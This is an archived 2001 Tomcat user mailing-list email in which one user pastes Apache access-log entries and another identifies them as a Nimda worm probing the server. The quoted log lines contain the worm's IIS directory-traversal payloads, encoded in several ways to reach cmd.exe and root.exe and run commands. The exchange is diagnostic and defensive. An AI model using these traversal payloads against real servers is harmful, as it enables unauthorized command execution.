Return-Path: Delivered-To: apmail-jakarta-tomcat-user-archive@jakarta.apache.org Received: (qmail 87559 invoked by uid 500); 10 Oct 2001 10:13:17 -0000 Mailing-List: contact tomcat-user-help@jakarta.apache.org; run by ezmlm Precedence: bulk Reply-To: tomcat-user@jakarta.apache.org list-help: list-unsubscribe: list-post: Delivered-To: mailing list tomcat-user@jakarta.apache.org Received: (qmail 87529 invoked from network); 10 Oct 2001 10:13:16 -0000 From: "Peter M. Nielsen" To: Subject: RE: Apache access.log - (whats going on) Date: Wed, 10 Oct 2001 12:13:29 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <000c01c15153$8a4a8700$a2134f3e@devserv> X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N Well, someone is trying to get the Nimda-virus to infect your machine. Hopefully you're running a linux-thang - Peter Institut for Konjunktur-Analyse Aabenraa 29 * DK-1124 K�benhavn K phone: (+45) 33 32 82 70 * fax: (+45) 33 93 03 67 * http://www.ifka.dk > -----Original Message----- > From: Lars Nielsen Lind [mailto:moonie@worldonline.dk] > Sent: 10. oktober 2001 08:20 > To: tomcat-user@jakarta.apache.org > Subject: Apache access.log - (whats going on) > > > Hi. > > I have read my access.log (apache) and found several IP's as > shown below. Whats going on? > > /Lars Nielsen Lind > > 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:50 +0200] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ > dir HTTP/1.0" 404 326 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+ > dir HTTP/1.0" 404 326 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c. > ./winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > 308 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > 308 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > 308 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:51 +0200] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 > 308 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 > 292 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > 404 309 "-" "-" > > 62.79.14.52 - - [10/Oct/2001:07:44:52 +0200] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" > > >